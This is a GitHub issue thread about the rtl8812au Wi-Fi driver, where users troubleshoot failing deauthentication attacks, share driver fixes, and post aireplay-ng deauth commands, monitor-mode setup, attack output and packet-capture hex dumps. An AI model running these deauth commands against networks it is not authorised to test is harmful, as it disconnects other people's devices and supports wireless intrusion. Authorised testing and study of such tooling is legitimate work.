aircrack-ng/rtl8812au #771: RTL8812AU & deauth

oldstanda, 2020-11-07:
Why deauth does it not work?

https://www.youtube.com/watch?v=laZaAVc7yKU

oldstanda, 2020-11-10:
The same is with kernel 5.9.6 and driver 5.7.0 ;-(

https://www.youtube.com/watch?v=6X2l1nD6cDw

oldstanda, 2020-11-10:
8812 vs 818b

https://www.youtube.com/watch?v=hN8T19eVf58

lrosic00, 2020-11-19:
Yeah, I got the same problem

oldstanda, 2020-11-21:
On these drivers 5.9.3.2 https://github.com/morrownr/8812au deauth works on the 5.4.0-54 kernel.

senyuuri, 2020-12-08:
> On these drivers 5.9.3.2 https://github.com/morrownr/8812au deauth works on the 5.4.0-54 kernel.

Thank you @oldstanda. The new driver works like a charm.

To share more context of the issue: I wasn't able to conduct a deauth attack with the v5.6.4.2 driver on my AWUS036ACH. I was testing on Kali with `5.8.0-kali2-amd64` kernel.

More specifically, the symptom was:
- `aireplay-ng -0` returned with no error, but with little ACKs (0 to 3 ACKs per 64 requests)
- The victim machine wouldn't disconnect no matter how many deauth packets were sent
- Tested on different protocols (WEP/WAP) and different devices (Macbook and Pixel 3a) but the result remained the same

After installed the v5.9.3.2 new driver:
- Deauth succeed with noticeable increase in ACKs 
  ```
  # aireplay-ng -0 1 -a xxxx -c yyyy wlan0
  09:04:30  Waiting for beacon frame (BSSID: xxxx) on channel 2
  09:04:31  Sending 64 directed DeAuth (code 7). STMAC: [yyyy] [19|55 ACKs]
  ```
- The failed deauth and succeeded deauth packets look exactly the same besides the timestamp.
```
# xxd deauth-failed.pcap                                                                                                                  
00000000: d4c3 b2a1 0200 0400 0000 0000 0000 0000  ................                                                                                                   
00000010: ffff 0000 6900 0000 c963 cf5f 43e8 0400  ....i....c._C...                                                                                                   
00000020: 1a00 0000 1a00 0000 c000 3a01 f018 9854  ..........:....T                                                                                                   
00000030: e6b4 1062 eb21 7d25 1062 eb21 7d25 0000  ...b.!}%.b.!}%..                                                                                                   
00000040: 0700                                     ..                                                                                                                 
# xxd deauth-success.pcap                                                                                                                 
00000000: d4c3 b2a1 0200 0400 0000 0000 0000 0000  ................                                                                                                   
00000010: ffff 0000 6900 0000 ee87 cf5f 3c5a 0c00  ....i......_<Z..                                                                                                   
00000020: 1a00 0000 1a00 0000 c000 3a01 f018 9854  ..........:....T                                                                                                   
00000030: e6b4 1062 eb21 7d25 1062 eb21 7d25 0000  ...b.!}%.b.!}%..                                                                                                   
00000040: 0700                                     ..  
```

mkarne1, 2023-04-25:
@oldstanda 

I can't deauthenticate any client from any Wifi. I installed the [latest driver](https://github.com/aircrack-ng/rtl8812au) with the following commands: 

```
sudo apt-get install bc mokutil build-essential libelf-dev linux-headers-`uname -r`
reboot
git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
cd rtl
make dkms_install  
```

Afterwards, I ran:

```
airmon-ng check kill
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
airodump-ng --bssid D4:3D:F3:74:F3:91 --channel 5 --write /tmp/test wlan0
```

And in a new terminal:

```
aireplay-ng --deauth 1000 -a D4:3D:XX:XX:XX:91 -c 14:7D:XX:XX:XX:44 wlan0          
19:46:04  Waiting for beacon frame (BSSID: D4:3D:F3:74:F3:91) on channel 5
19:46:05  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [31|73 ACKs]
19:46:05  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [74|89 ACKs]
19:46:06  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [136|118 ACKs]
19:46:06  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [ 2|63 ACKs]
19:46:07  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [ 0|63 ACKs]
19:46:07  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [ 1|64 ACKs]
19:46:08  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [14|65 ACKs]
19:46:08  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [89|89 ACKs]
19:46:09  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [74|88 ACKs]
19:46:09  Sending 64 directed DeAuth (code 7). STMAC: [14:7D:XX:XX:XX:44] [128|119 ACKs]
```

It just keeps sending deauth packets but the client isn't deauthenticating. 

Any help would be really appreciated!

Thanks!